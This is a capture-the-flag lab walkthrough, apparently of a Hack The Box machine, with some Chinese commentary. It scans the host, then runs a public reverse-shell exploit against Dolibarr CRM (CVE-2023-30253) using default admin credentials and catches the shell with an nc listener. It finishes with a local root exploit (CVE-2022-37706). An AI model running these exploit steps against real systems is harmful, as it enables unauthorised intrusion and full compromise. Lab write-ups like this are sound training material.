└──╼ [★]$ nmap -sV Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 06:53 CDT Nmap scan report for Host is up (0.24s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└──╼ [★]$ echo" crm.board.htb" | sudo tee -a /etc/hosts crm.board.htb
用瀏覽器訪問 crm.board.htb 會看到一個登入頁面: 看到 title 是 Dolibarr,上網查一下這是什麼:
---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---
positional arguments: hostname Target hostname username Username of Dolibarr ERP/CRM password Password of Dolibarr ERP/CRM lhost Listening host for reverse shell lport Listening port for reverse shell
options: -h, --help show this help message and exit ┌─[sg-vip-2]─[]─[kazma@htb-jejtlehtvs]─[~/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253] └──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin 4444 [*] Trying authentication... [**] Login: admin [**] Password: admin [*] Trying created site... [*] Trying created page... [*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
Reverse shell:
└──╼ [★]$ nc -nlvp 4444 listening on [any] 4444 ... connect to [] from (UNKNOWN) [] 44222 bash: cannot set terminal process group (893): Inappropriate ioctl for device bash: no job control in this shell www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
└──╼ [★]$ ssh [email protected] The authenticity of host ' (' can't be established. ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '' (ED25519) to the list of known hosts. [email protected]'s password:
larissa@boardlight:~$ vi exploit.sh larissa@boardlight:~$ chmod +x exploit.sh larissa@boardlight:~$ ./exploit.sh CVE-2022-37706 [*] Trying to find the vulnerable SUID file... [*] This may take few seconds... [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can't find in /etc/fstab. # whoami root # find / -name "root.txt" /root/root.txt